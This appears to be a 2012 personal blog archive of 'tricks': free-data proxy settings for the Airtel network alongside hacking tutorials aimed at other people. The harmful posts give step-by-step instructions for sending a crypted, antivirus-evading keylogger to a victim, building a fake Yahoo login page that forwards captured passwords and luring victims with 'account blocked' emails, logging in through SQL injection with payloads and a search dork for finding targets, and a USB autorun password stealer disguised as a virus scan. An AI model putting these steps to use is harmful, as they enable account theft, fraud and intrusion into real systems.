Wednesday, March 21, 2012

Simple Trick to Hide Your Real I.P. Address

Simple Trick to Hide Your Real I.P. Address

  • Go to 10minutemail.com
  • Create an acount in PD-Proxy with email from  10minutemail.com
  • With demo server you can change your ip.


Nimbuzz S60v5^3 Airtel FM Mod By Vspairtel.sis


Description:

Nimbuzz 3.3 S60v5 S^3 Modded For Airtel

Apn : airtelgprs.com
Proxy : 195.211.49.14
Port : 80



Nimbuzz S60v5^3 Airtel FM Mod By Vspairtel.sis (1.87 mb)


Download



Opera Mini 7 Next Airtel Mod s60v3 V5 .sis


Description:

  • For Nokia  s60v5 and s60v3

Download

Opera Mini 7.0 mod s60v5 s60v3.sisx (1.16 mb)


Opera Mini 6.5.2.apk


Description

Opera Mini 6.5.2 for Android:





Download

Opera Mini 6.5.2.apk (0.83 mb)



Handler Settings:

  • Proxy type: Host or Real Host
  • Proxy Server: fb.me or m.twitter.com


Friday, March 16, 2012

AirTel Proxy Servers 2012


Proxies for browsing and downloading.
  1. 208.77.23.4
  2. 176.31.222.34
  3. 174.142.196.230
  4. German-proxy.de (or) 91.143.83.139
  5. 66.90.76.90
  6. 67.159.46.202
  7. 68.233.235.54
  8. 91.143.83.139
  9. 209.97.221.88
  10. 66.90.79.174
  11. 69.10.51.83
  12. 76.73.10.122
  13. 92.48.64.150
  14. 67.159.14.90
  15. 68.169.45.129
  16. 72.9.152.75
  17. 76.73.16.123
  18. 74.63.88.156
  19. 85.214.50.141
  20. 174.142.196.230
  21. 74.63.88.156
  22. kproxy.com
  23. 68.233.235.54
  24. 66.232.100.247
  25. 188.165.231.191
  26. 92.48.64.150
Homepage: 
  • http://fb.me/
  • http://m.twitter.com/
  • http://0.facebook.com/
  • http://live.airtelworld.com/
APN: airtelgprs.com

Proxies with YouTube support.
  1. 209.17.190.79
  2. 85.31.186.21
  3. sneakme.net or 208.77.23.4
  4. 66.90.76.90

Proxies with special homepage:
  1. 174.142.196.230 or 85.214.50.141 [Supports YouTube Too]
  2. 67.117.201.129
    Homepage: fb.me/cgi-bin/nph-proxy.cgi/000000A/http/google.com

Note:
  • Try this at zero balance without net pack.
  • Use 3G for better speed.
  • Please comment if the proxies not working in your region.



how to hack facebook or any account

What is Keylogging?

Basically, Keylogging is the process of creating server keylogger and then sending this server.exe file to the victim. Once the keylogger server is installed on victim computer, all text and passwords typed on his computer are sent to you in your email inbox by this server created using keylogger. So, you get his typed passwords and thus can easily hack his email password.

Also, server keyloggers are detected by antiviruses. So, you need to have FUD (Fully UnDetectable) keylogger so that victim computer's antivirus will not detect your sent server keylogger as virus and prevent it from being deleted.


Azure AIO is an all-in-one pack that contains all hacking tools necessary to hack MSN, Windows Live password. This pack contains keylogger with all softwares needed to make in undetectable from antiviruses. The package contains:
  • Keylogger
  • FUD Crypter
  • Binder
  • Icon Changer
  • File Pumper
1. First of all download Azure AIO Pack from google.

2. Now run Azure.exe application

3. Click on "Keylogger" to get Keylogger interface.

4. Enter your Gmail username and password. Select the time interval within which you wish to receive mail from victim computer and also the name of the keylogger server. Hit on Build and server will be saved in current directory.

5. This created server is 2/21- detected by Kaspersky and McAfee.
Hit on "Crypter" and get Crypter interface. Select this created keylogger server and crypt this server using Azure crypter. The crypted server is 100% FUD.

6. Now click on "Binder" to bind this server with any .exe application and send this binded file to victim.


7. As soon as victim runs binded file on his computer, our sent keylogger server is installed on his computer and you start receiving all his typed keystrokes and password in your inbox like this:


You can also select "Icon Changer" to change the icon of server.exe and "File Pumper" to change the size of the file.

I have tried this keylogger on Windows 7 and it worked great for me.

Now you can use this keylogger to hack not only Windows Live password, but any other e-mail or website account password.

Do you have questions, comments, or suggestions? Feel free to post a comment!



hacking with telnet

Telnet is a remote hacking tool that was made by Microsoft. Telnet actually lets you remote into machines, or connect to different computers remotely -- WITHOUT physically being at the computer. Hackers do EVERYTHING remote, and for obvious reasons. As a golden rule, hackers NEVER hack directly from their own home/parents' basement. This makes it really easy for the feds to hunt you down.

Instead, skilled hackers remote into a chain of several computers around the world, making your tracks a lot harder to find. This is called footprinting. Telnet will allow you to log into any computer (provided that it's running Telnet). I recommend running Telnet and having it open on your computer(s).

Why Telnet?

There are several reasons to run Telnet. Assuming that you're running Windows XP, here are some of the benefits
  • Small
  • Fast
  • Built right into Windows - easily accessable
  • Widely used
  • Secure
  • Lets you log into computers remotely
Telnet is the only technology that gives you the power to control machines remotely. And in order to cover your tracks, it is highly recommended that you learn how to use it.

How to Chain-hack with Telnet

Chain hacking is a method in which a hacker uses Telnet to connect through a chain of computers and hack a computer/person/server from a different location. It might sound complicated to the average newbie, but it's quite simple. Just follow these steps:
  1. Choose public place with an internet connection, such as a library or coffee shop. Bring your own equipment if possible.
  2. Run telnet (Start > Run > Telnet)
  3. Log into a remote server
  4. Use that server to remote into another server
  5. Repeat steps 2-4 a couple times
  6. Hack your target
What you're basically doing is using a series of machines as a chain in order to conceal your location/identity. The farther away each server/remote PC is from the other, the better. If you can remote across to a different continent, I would recommend doing so, because that's what I do when I hack big company databases. This method is explained in more detail here.


how to download torrent files with IDM or any download manager

Steps:

1. First of all , you have to download the torrent file(.torrent) which you want to download.
2. Then just go to the website www.torcache.net and upload the torrent file that you have just downloaded and click on the cache! button.
torcache How To Download Torrent File using IDM
3. This will give you a new torrent file . You just have to copy the link of the new torrent file from the opened window.
4. Then go to the website www.torrific.com and create an account there(in case you don’t have) and login to your account. Then paste the address of the new torrent obtained in step 3 and click on Get button.
torrific How To Download Torrent File using IDM
5. Now you will get the list of available files present in that torrent file. Then click on the initiate bittorrent transmission button. This will give the full option to download the file. Just click on any link and you can see the download manager-IDM popping out for downloading the file.
Now enjoy the ultimate Speed of IDM for downloading torrents too…


Thursday, March 15, 2012

4 best ways to hack facebook password

I will cover 4 methods over here:

1. Facebook Phishing
2. Keylogging
3. Social engineering
4. Primary email address hack
Facebook phishing:

I have taken this method first because i think this is the most popular method/way of hacking facebook. I studied various facebook surveys taken on web about hacking facebook. The results of these surveys show "Phishing" as the most used method to hack facebook and to note…"Phishing is favorite method of facebook hackers". So, friends.. beware of facebook Phishing. Facebook staff is working hard to avoid these Facebook phishers. Phishing not only allows you to hack Facebook but also almost any email account. You have to only get the trick used to make a phisher, which i think is very easy. I learnt it without any difficulty. But, remember, this is only for educational purpose. I will not extend this topic over here.

Keylogging:


This is my second favorite, as only thing you have to do is remotely install a keylogger application (if you don't have any physical access to victim computer). Keylogging becomes more easy if you have physical access to victim computer as only thing you have to do is install a keylogger and direct it to your destination so that it will send all recorded keystrokes to pointed destination. What a keylogger does is it records the keystrokes into a log file and then you can use these logs to get required Facebook password and thus can hack facebook password.

3. Social engineering:

This sounds to be pretty not working at beginning. Even I was neglecting this way. But, once, I thought of using it against my friend on Facebook and i got his Facebook password very easily by this method. I think many of you might be knowing how what this social engineering, For newbies, social engineering is method of retrieving password or answer of security question simply be quering with the victim. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.


4.Primary email address hack
So far, i found these Facebook hacking methods as best and working ways to hack facebook account passwords. I never encourage hacking Facebook or any email account,,I just wanna make you aware about Facebook dangers online. I will appreciate your effort if you mention any other Facebook hacking method.



10 best hackers and their hacks

Black Hat Crackers
The Internet abounds with hackers, known as crackers or "black hats," who work to exploit computer systems. They are the ones you've seen on the news being hauled away for cybercrimes. Some of them do it for fun and curiosity, while others are looking for personal gain. In this section we profile five of the most famous and interesting "black hat" hackers.
  1. Jonathan James: James gained notoriety when he became the first juvenile to be sent to prison for hacking. He was sentenced at 16 years old. In an anonymous PBS interview, he professes, "I was just looking around, playing around. What was fun for me was a challenge to see what I could pull off."
    James's major intrusions targeted high-profile organizations. He installed a backdoor into a Defense Threat Reduction Agency server. The DTRA is an agency of the Department of Defense charged with reducing the threat to the U.S. and its allies from nuclear, biological, chemical, conventional and special weapons. The backdoor he created enabled him to view sensitive emails and capture employee usernames and passwords.
    James also cracked into NASA computers, stealing software worth approximately $1.7 million. According to the Department of Justice, "The software supported the International Space Station's physical environment, including control of the temperature and humidity within the living space." NASA was forced to shut down its computer systems, ultimately racking up a $41,000 cost. James explained that he downloaded the code to supplement his studies on C programming, but contended, "The code itself was crappy . . . certainly not worth $1.7 million like they claimed."
    Given the extent of his intrusions, if James, also known as "c0mrade," had been an adult he likely would have served at least 10 years. Instead, he was banned from recreational computer use and was slated to serve a six-month sentence under house arrest with probation. However, he served six months in prison for violation of parole. Today, James asserts that he's learned his lesson and might start a computer security company.
  2. Adrian Lamo: Lamo's claim to fame is his break-ins at major organizations like The New York Times and Microsoft. Dubbed the "homeless hacker," he used Internet connections at Kinko's, coffee shops and libraries to do his intrusions. In a profile article, "He Hacks by Day, Squats by Night," Lamo reflects, "I have a laptop in Pittsburgh, a change of clothes in D.C. It kind of redefines the term multi-jurisdictional."
    Lamo's intrusions consisted mainly of penetration testing, in which he found flaws in security, exploited them and then informed companies of their shortcomings. His hits include Yahoo!, Bank of America, Citigroup and Cingular. When white hat hackers are hired by companies to do penetration testing, it's legal. What Lamo did is not.
    When he broke into The New York Times' intranet, things got serious. He added himself to a list of experts and viewed personal information on contributors, including Social Security numbers. Lamo also hacked into The Times' LexisNexis account to research high-profile subject matter.
    For his intrusion at The New York Times, Lamo was ordered to pay approximately $65,000 in restitution. He was also sentenced to six months of home confinement and two years of probation, which expired January 16, 2007. Lamo is currently working as an award-winning journalist and public speaker.
  3. Kevin Mitnick: A self-proclaimed "hacker poster boy," Mitnick went through a highly publicized pursuit by authorities. His mischief was hyped by the media but his actual offenses may be less notable than his notoriety suggests. The Department of Justice describes him as "the most wanted computer criminal in United States history." His exploits were detailed in two movies: Freedom Downtime and Takedown.
    Mitnick had a bit of hacking experience before committing the offenses that made him famous. He started out exploiting the Los Angeles bus punch card system to get free rides. Then, like Apple co-founder Steve Wozniak, dabbled in phone phreaking. Although there were numerous offenses, Mitnick was ultimately convicted for breaking into the Digital Equipment Corporation's computer network and stealing software.
    Mitnick's mischief got serious when he went on a two and a half year "coast-to-coast hacking spree." The CNN article, "Legendary computer hacker released from prison," explains that "he hacked into computers, stole corporate secrets, scrambled phone networks and broke into the national defense warning system." He then hacked into computer expert and fellow hacker Tsutomu Shimomura's home computer, which led to his undoing.
    Today, Mitnick has been able to move past his role as a black hat hacker and become a productive member of society. He served five years, about 8 months of it in solitary confinement, and is now a computer security consultant, author and speaker.
  4. Kevin Poulsen: Also known as Dark Dante, Poulsen gained recognition for his hack of LA radio's KIIS-FM phone lines, which earned him a brand new Porsche, among other items. Law enforcement dubbed him "the Hannibal Lecter of computer crime."
    Authorities began to pursue Poulsen after he hacked into a federal investigation database. During this pursuit, he further drew the ire of the FBI by hacking into federal computers for wiretap information.
    His hacking specialty, however, revolved around telephones. Poulsen's most famous hack, KIIS-FM, was accomplished by taking over all of the station's phone lines. In a related feat, Poulsen also "reactivated old Yellow Page escort telephone numbers for an acquaintance who then ran a virtual escort agency." Later, when his photo came up on the show Unsolved Mysteries, 1-800 phone lines for the program crashed. Ultimately, Poulsen was captured in a supermarket and served a sentence of five years.
    Since serving time, Poulsen has worked as a journalist. He is now a senior editor for Wired News. His most prominent article details his work on identifying 744 sex offenders with MySpace profiles.
  5. Robert Tappan Morris: Morris, son of former National Security Agency scientist Robert Morris, is known as the creator of the Morris Worm, the first computer worm to be unleashed on the Internet. As a result of this crime, he was the first person prosecuted under the 1986 Computer Fraud and Abuse Act.
    Morris wrote the code for the worm while he was a student at Cornell. He asserts that he intended to use it to see how large the Internet was. The worm, however, replicated itself excessively, slowing computers down so that they were no longer usable. It is not possible to know exactly how many computers were affected, but experts estimate an impact of 6,000 machines. He was sentenced to three years' probation, 400 hours of community service and a fined $10,500.
    Morris is currently working as a tenured professor at the MIT Computer Science and Artificial Intelligence Laboratory. He principally researches computer network architectures including distributed hash tables such as Chord and wireless mesh networks such as Roofnet.
White Hat Hackers
Hackers that use their skills for good are classified as "white hat." These white hats often work as certified "Ethical Hackers," hired by companies to test the integrity of their systems. Others, operate without company permission by bending but not breaking laws and in the process have created some really cool stuff. In this section we profile five white hat hackers and the technologies they have developed.
  1. Stephen Wozniak: "Woz" is famous for being the "other Steve" of Apple. Wozniak, along with current Apple CEO Steve Jobs, co-founded Apple Computer. He has been awarded with the National Medal of Technology as well as honorary doctorates from Kettering University and Nova Southeastern University. Additionally, Woz was inducted into the National Inventors Hall of Fame in September 2000.
    Woz got his start in hacking making blue boxes, devices that bypass telephone-switching mechanisms to make free long-distance calls. After reading an article about phone phreaking in Esquire, Wozniak called up his buddy Jobs. The pair did research on frequencies, then built and sold blue boxes to their classmates in college. Wozniak even used a blue box to call the Pope while pretending to be Henry Kissinger.
    Wozniak dropped out of college and came up with the computer that eventually made him famous. Jobs had the bright idea to sell the computer as a fully assembled PC board. The Steves sold Wozniak's cherished scientific calculator and Jobs' VW van for capital and got to work assembling prototypes in Jobs' garage. Wozniak designed the hardware and most of the software. In the Letters section of Woz.org, he recalls doing "what Ed Roberts and Bill Gates and Paul Allen did and tons more, with no help." Wozniak and Jobs sold the first 100 of the Apple I to a local dealer for $666.66 each.
    Woz no longer works full time for Apple, focusing primarily on philanthropy instead. Most notable is his function as fairy godfather to the Los Gatos, Calif. School District. "Wozniak 'adopted' the Los Gatos School District, providing students and teachers with hands-on teaching and donations of state-of-the-art technology equipment."
  2. Tim Berners-Lee: Berners-Lee is famed as the inventor of the World Wide Web, the system that we use to access sites, documents and files on the Internet. He has received numerous recognitions, most notably the Millennium Technology Prize.
    While a student at Oxford University, Berners-Lee was caught hacking access with a friend and subsequently banned from University computers. w3.org reports, "Whilst [at Oxford], he built his first computer with a soldering iron, TTL gates, an M6800 processor and an old television." Technological innovation seems to have run in his genes, as Berners-Lee's parents were mathematicians who worked on the Manchester Mark1, one of the earliest electronic computers.
    While working with CERN, a European nuclear research organization, Berners-Lee created a hypertext prototype system that helped researchers share and update information easily. He later realized that hypertext could be joined with the Internet. Berners-Lee recounts how he put them together: "I just had to take the hypertext idea and connect it to the TCP and DNS ideas and – ta-da! – the World Wide Web."
    Since his creation of the World Wide Web, Berners-Lee founded the World Wide Web Consortium at MIT. The W3C describes itself as "an international consortium where Member organizations, a full-time staff and the public work together to develop Web standards." Berners-Lee's World Wide Web idea, as well as standards from the W3C, is distributed freely with no patent or royalties due.
  3. Linus Torvalds: Torvalds fathered Linux, the very popular Unix-based operating system. He calls himself "an engineer," and has said that his aspirations are simple, "I just want to have fun making the best damn operating system I can."
    Torvalds got his start in computers with a Commodore VIC-20, an 8-bit home computer. He then moved on to a Sinclair QL. Wikipedia reports that he modified the Sinclair "extensively, especially its operating system." Specifically, Torvalds hacks included "an assembler and a text editor…as well as a few games."
    Torvalds created the Linux kernel in 1991, using the Minix operating system as inspiration. He started with a task switcher in Intel 80386 assembly and a terminal driver. After that, he put out a call for others to contribute code, which they did. Currently, only about 2 percent of the current Linux kernel is written by Torvalds himself. The success of this public invitation to contribute code for Linux is touted as one of the most prominent examples of free/open source software.
    Currently, Torvalds serves as the Linux ringleader, coordinating the code that volunteer programmers contribute to the kernel. He has had an asteroid named after him and received honorary doctorates from Stockholm University and University of Helsinki. He was also featured in Time Magazine's "60 Years of Heroes."
  4. Richard Stallman: Stallman's fame derives from the GNU Project, which he founded to develop a free operating system. For this, he's known as the father of free software. His "Serious Bio" asserts, "Non-free software keeps users divided and helpless, forbidden to share it and unable to change it. A free operating system is essential for people to be able to use computers in freedom."
    Stallman, who prefers to be called rms, got his start hacking at MIT. He worked as a "staff hacker" on the Emacs project and others. He was a critic of restricted computer access in the lab. When a password system was installed, Stallman broke it down, resetting passwords to null strings, then sent users messages informing them of the removal of the password system.
    Stallman's crusade for free software started with a printer. At the MIT lab, he and other hackers were allowed to modify code on printers so that they sent convenient alert messages. However, a new printer came along – one that they were not allowed to modify. It was located away from the lab and the absence of the alerts presented an inconvenience. It was at this point that he was "convinced…of the ethical need to require free software."
    With this inspiration, he began work on GNU. Stallman wrote an essay, "The GNU Project," in which he recalls choosing to work on an operating system because it's a foundation, "the crucial software to use a computer." At this time, the GNU/Linux version of the operating system uses the Linux kernel started by Torvalds. GNU is distributed under "copyleft," a method that employs copyright law to allow users to use, modify, copy and distribute the software.
    Stallman's life continues to revolve around the promotion of free software. He works against movements like Digital Rights Management (or as he prefers, Digital Restrictions Management) through organizations like Free Software Foundation and League for Programming Freedom. He has received extensive recognition for his work, including awards, fellowships and four honorary doctorates.
  5. Tsutomu Shimomura: Shimomura reached fame in an unfortunate manner: he was hacked by Kevin Mitnick. Following this personal attack, he made it his cause to help the FBI capture him.
    Shimomura's work to catch Mitnick is commendable, but he is not without his own dark side. Author Bruce Sterling recalls: "He pulls out this AT&T cellphone, pulls it out of the shrinkwrap, finger-hacks it, and starts monitoring phone calls going up and down Capitol Hill while an FBI agent is standing at his shoulder, listening to him."
    Shimomura out-hacked Mitnick to bring him down. Shortly after finding out about the intrusion, he rallied a team and got to work finding Mitnick. Using Mitnick's cell phone, they tracked him near Raleigh-Durham International Airport. The article, "SDSC Computer Experts Help FBI Capture Computer Terrorist" recounts how Shimomura pinpointed Mitnick's location. Armed with a technician from the phone company, Shimomura "used a cellular frequency direction-finding antenna hooked up to a laptop to narrow the search to an apartment complex." Mitnick was arrested shortly thereafter. Following the pursuit, Shimomura wrote a book about the incident with journalist John Markoff, which was later turned into a movie...


Wednesday, March 14, 2012

How to Customize Firefox to Look like Google Chrome

Firefox and Chrome are the two best, fast and stable browsers. Some people love to use Firefox due to its massive add-ons support but well you get now everything you want with Chrome using its extensions but if you are in real love with your Firefox browser than you can customize it to look like Chrome with easy Add-on’s.
Chromifox Basic and Chromifox Extreme are the two add-on’s for Firefox which can accomplish this task really easily.
Chromifox Basic is a coat of chrome for Firefox. It’s a bright and soft blue theme for Firefox on Windows, Mac OS X, and Linux, inspired by the appearance of the Google Chrome browser and its open source roots, Chromium.
Chromifox basic and Chromifox Extreme
So now if you want to customize your Firefox too than you can visit and install below add-ons for free and give your Firefox the Chrome look.
Link : Chromifox Basic
Link : Chromifox Extreme


How to Skip those Irritating YouTube Ads Immediately

Now days YouTube has started buffering many advertisements before actual video plays this happens mostly on a high rated and viewed video so you might have figured this up if you are a regular YouTube browser, so obviously those advertisements are irritating and they make us leave that page so that we can watch another one saving some time.
But what if we can remove those ads completely just with one click, well yes now you can do that using a nice chrome extension called “Skip ads on YouTube” well this is a free and simply extension you just need to install it and it will be embed into YouTube with a little blue arrow icon.
YouTube ads Skip
So now when ever you visit any video on YouTube that plays advertisement like above in the image right on top of the video just click on that Blue Arrow you see like in the image above and than as soon as you click it your page will refresh and than you will not have any advertisement.


increase firefox Download Speed Using FireDownload

firedownload-logoIf you are a regular downloader and love to download all kinds of stuff from Internet and you do not use any kind of download managers than FireDownload can be your best alternate which when combined with Firefox will provide you 10 times acceleration on your downloads so that means you will get state of the art download speed without even spending a penny because this add-on is available for free.
FireDownload is the extension which will provide you furious speeds on the go without any problems. So you just needed to install this add-on on your Firefox browser and than just download anything and your downloads will be boosted using this add-on.

Installing FireDownload Add-on on Firefox :

If you want to install this add-on you can grab it from http://www.fireaddons.com/downloads/ just click on Install for Windows on your Firefox browser and than this add-on will be installed. Now just restart your browser once and than try downloading any file from the internet and see the difference.


RECOVER DELETED DATA USING RECLAIME

1. Install & Launch ReclaiMe (download here).
2. Select your drive from the list of devices.
3. Click “Start” to begin the recovery process.
4. Click “Save” to save the recovered data.


Send Messages to Other PCs over LAN on Windows

Windows XP SP2

  1. Run command prompt (Windows Logo Key + R, then type “cmd.exe”).
    Running Command Prompt
    Running Command Prompt
  2. Type net send x “Your message goes in here between in quotes”, in this command, replace the “x” with the username of the PC on your LAN to which you want the message to be sent. And hit Enter.
    How to use Net Send command
    How to use Net Send command
    If the user is on-line, your message will be sent or else an error message would appear.
  3. You can also send messages to ALL THE PCs connected to your LAN at ONCE! To do that just type this command: net send * “Your message here!”
  4. The star(*) in the above command tells cmd to send the message to all the PCs which are connected to your LAN rather than specifying one (including your PC also) :D

On Windows Vista and Windows 7

It’s the same thing as above, except the “net send”, you’ve to replace it with “msg”.
For example, msg x “Your message here” or (to send to all PCs) msg * “Your message here”
Please Note:
The ports used by these messenger services are 135, 137, 138, and 139. Make sure they aren’t blocked or the message will not be sent.


HOW TO HACK USING FAKE LOGIN PAGE

HACK USING FAKE LOGIN PAGE
YAHOO MSN GMAIL YOUTUBE FACEBOOK MYSPACE XANGA HOTMAIL LIVE ORKUT TWITTER M
BEBO FRIENSTER BLACKPLANET IBIBO IN MAIL ADSENSE ADWORDS ETC USING FAKE LOGIN PAGE

For example i will show you to hack yahoo email id passwords similarly you can hack other social networking sites and other login sites

1. Open the website of Yahoo Mail. goto
http://mail.yahoo.com

2. Now press "CTRL+U" you will get the source code of yahoo mail page. now copy it

3. Now open a notepad, paste it and save it as fakelogin.html

4. Search for this
me t h o d = " p o s t " a c t i o n =
This code will be there is all web sites which has login facility

5. Now open the the file fakelogin.html using notepad, here you ll find a code which starts with ( This code is for Yahoo.)
me t h o d = " p o s t " a c t i o n = " h t t p s : / / l o g i n . y a h o o . c om/ c o n f i g / l o g i n ? " a u t o c omp l e t e = " " n ame = " l o g i n _ f o r m" o n s u bm i t = " r e t u r n h a s h 2 ( t h i s ) " >

6. You need to change the code line (h t t p s : / / l o g i n . y a h o o . c om/ c o n f i g / l o g i n ? )
For others there will be links like
Example : http://login.xxxx.......
You have to change the full link with the link you will get 7

7 . Go to http:// allforms.mailjol.net/ register there

8. create a form processor
create ==> form processor ==> tick the box click next ==> click next === > If you want to redirect the person submitting your form successfully to a webpage of
your choice, you can provide its correct HTTP/
HTTPS address in the box below.
type (http://mail.yahoo.com) for others type there login page
==> click next ===> click next ===> click next ===> click next ===> click save

9. Copy the bottom click and replace (h t t p s : / / l o g i n . y a h o o . c om/ c o n f i g / l o g i n ? ) this will be diffrent to others to (https://secure.mailjol.net/allforms/ u/5d7874b4.php) example

10. It will look like this me t h o d = " p o s t " a c t i o n = " https:// secure.mailjol.net/allforms/u/5d7874b4.php ? " a u t o c omp l e t e = " " n ame = " l o g i n _ f o r m" o n s u bm i t = " r e t u r n h a s h 2 ( t h i s ) " >
This will be diffrent to others

11. replace the notepad .txt to .html

12. open in an web browser and see

13. host it to free web hosting sites like http://webs.com
http://ucoz.com
etc there are alots

14. When some one login from your fake login page his password
will be shown in your email id which you used in registering you allforms

15. email your fake login page link through anonymous mail like this http://deadfake.com/Send.aspx there are lots of sits like this
Google anonymous mail from more

16. email like this "YOUR ACCOUNT IS BLOCK" and link your website so the person logins through our fake page

Hacking done!!


hack websites using SQL injection

SQL , often referred to as Structured Query Language, is a database computer language designed for managing data in relational database management systems (RDBMS), and originally based upon relational algebra and calculus. Its scope includes data insert, query, update and delete, schema creation and modification, and data access control.
{Wikipedia Definition}
In a nutshell, SQL is the most user friendly Web Programming language highly used and appreciated.

SQL INJECTION:
"An attack technique used to exploit web sites by altering backend SQL statements through manipulating application input."
- Web Application Security Consortium Glossary
OR It is a way by which people can exploit the user-friendliness of the server and use it to gain data access etc.
SQL website servers are generally saved as formats of .php or .asp or .aspx

SQL language is simply based upon certain codes which can be exploited easily unless and until taken care of.

If you get across a SQL server , look out for the following.
First of all you need to get to the administrator or login pages of a website.
{It may take time to find one , Will explain the ways to find the admin page later }


CHECKING FOR VULNERABILITIES:
First of all we need to find whether the server is vulnerable to SQL injection or not.
In the admin login page,
In the username enter a single character apostrophe  that is    '
and in the password field enter a single character equal that is   =
press login.
If the page shows an error report like Internal Server Error or LANGUAGE NOT DEFINED , etc. , then the website is vulnerable to sql injection.
Now,
Open the source page of the website, {In firefox open the View column and click on page source}
look for something like


<form><input></input>

<input></input>
<input></input>

</form>
OR
SELECT * FROM members WHERE username = 'user' AND password = 'password'

Now here comes the Hack Exploit,

When in the main page , We type username in the username box , the script changes to "username='hellboyuser'"
Now the hack

Got to the main page and in the Username box type     admin'--
what it means,
it will change the script to "username='admin'--'"
the two hashes -- in the script language means IGNORE THE REST, which mean the script will ignore the password area.
So
    • SELECT * FROM members WHERE username = 'admin'--'|||||| AND password = 'password'
    This is going to log you as admin user, because rest of the SQL query will be ignored.
|||| shows that the rest of the code will be ignored.

Coming back,

In the username type admin'--   and leave out the password field , press login and get access to the administrator page.
EXCEPTIONS:
Some website programmers know this hack so you may need to enter multiple passwords
Eg:

In the username type     admin
In the password type      'or''='

also try out these attributes ,
' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

' or 1=1#

Works fantastic.
This hack doesn't work on all websites and I prefer you not to try it on any legal website.
To find the vulnerable sites ,  go to google and search,  inurl:/adminlogin.asp
this search brings out the admin login pages of many website,
try on own risk.
THIS PAGE IS FOR EDUCATIONAL PURPOSES ONLY.

TRY ON UR OWN


Hack passwords using USB pen drive

1. Download all the 5 tools,  mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe . And copy into your USB Drive.
2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive) & if the autorun does not works , just double click the launch.bat file which you have created in step 3.
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP, Vista and Windows 7

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.


Tuesday, March 13, 2012

Cool JavaScript Tricks

 use this codes in opera or older version of firefox

 

Play the “Lord of the Web”

This code lets you edit any page/website in real-time :) .
javascript:document.body.contentEditable='true'; document.designMode='on'; void 0

The Big Wheel

This piece of code pulls off all the images from your web page and rotates them in a circle. Really makes any page go naked (without its images). The best place to test is a website with many images. (Google Images for an example)
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);

If you look carefully in the above code, its rotating the HTML “img” tag. Just replace it with “a” or “p” and watch some links or text rotate instead of images.

Tremors

Your browser will be very afraid of this code :) If the code below doesn’t seem to work, please replace > with > and < with <
javascript:function flood(n) {if (self.moveBy) {for (i = 200; i > 0;i–){for (j = n; j > 0; j–) {self.moveBy(1,i); self.moveBy(i,0);self.moveBy(0,-i); self.moveBy(-i,0); } } }}flood(6);{ var inp = “D-X !msagro na dah tsuj resworb rouY”; var outp = “”; for (i = 0; i <= inp.length; i++) {outp =inp.charAt (i) + outp ; } alert(outp) ;}; reverse

The Calculator

In case you are not in a mood to use the standard windows calculator and want your browser to do the dirty job for you, use this code.
javascript: alert(34343+3434-222);
You can change the numbers according to your choice and also try creative complex equations. Just put your arithmetic into javascript: alert( );

Finding Spoof Websites

There are times when you are not sure that the website that you are visiting is authentic. Use this code whenever in doubt :-
javascript:alert("The actual URL is:\t\t" + location.protocol + "//" + location.hostname + "/" + "\nThe address URL is:\t\t" + location.href + "\n" + "\nIf the server names do not match, this may be a spoof.");


Best Funny Google Search Suggestions

google knows what you’re about to ask, and it’s hilarious. LOL
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 


check it out

go to google.com , search (top 50 woman on the internet) without the brackets , go to the first link and check who is on no. '7' :-D


Airtel Opera Mini 5.1 Handler Trick:

Now "m.twitter.com" Is Blocked By Airtel So,Lots Of Working Handler Tricks Are Stopped Working.But i Founded A New Airtel Opera Mini Handler Trick For March 2012.This Airtel Opera Mini Handler Trick Is Working 100% .Tested By Me Today.


Airtel Opera Mini 5.1 Handler Trick:
Guy's Try This Trick With Low Balance.Its Also Working In Zero Balance...
First Make Airtel MO or Airtel Live Settings As Default In Your Mobile
Then Download Opera Mini 5.1 Handler From This Link >Download OperaMini 5.1 HUI<
Then Open Opera Mini 5.1 Handler And Scroll Down
For Better Speed Put Back Query As "?fb.me/browse.php"
Then Again Scroll Down And Choose Proxy Type As "HOST"
Set Proxy Server As "fb.me"
Then Save The Configuration And Run Opera Mini 5.1 Handler
It Will Take Few Seconds To Loading.

Enjoy Free Unlimited Airtel Free Gprs Trick With New Airtel Opera Mini 5.1 Handler Trick


3 Ways to access ‘Must Sign Up to View’ Sites


1. Bug Me Not

Bug Me Not! which is a wonderful service that provides disposable login details for most sites and forums. You could use those IDs and passwords to login – bypassing compulsory registrations. Most of the time this should suffice, especially for popular sites. There’s also a Firefox extension available.
Using Bug Me Not to bypass compulsory logins
But Bug Me Not obviously does not have login details for every site on the entire internet. Sometimes the login details provided for some of these sites don’t work anymore. In that case, you could try the following methods:

Google Cache

If the snippet near the result seemed to talk about the problem you’re having, there are high chances that Google Cache should have a copy of the website you landed on. One of the sites where it works quite well is ‘Experts Exchange’.
Using Google Cache to Bypass compulsory registrations

3. Be the Bot

In a rare case when you’re not able to view the solution even by accessing the Google Cache, you can use Be The Bot.
bethebot
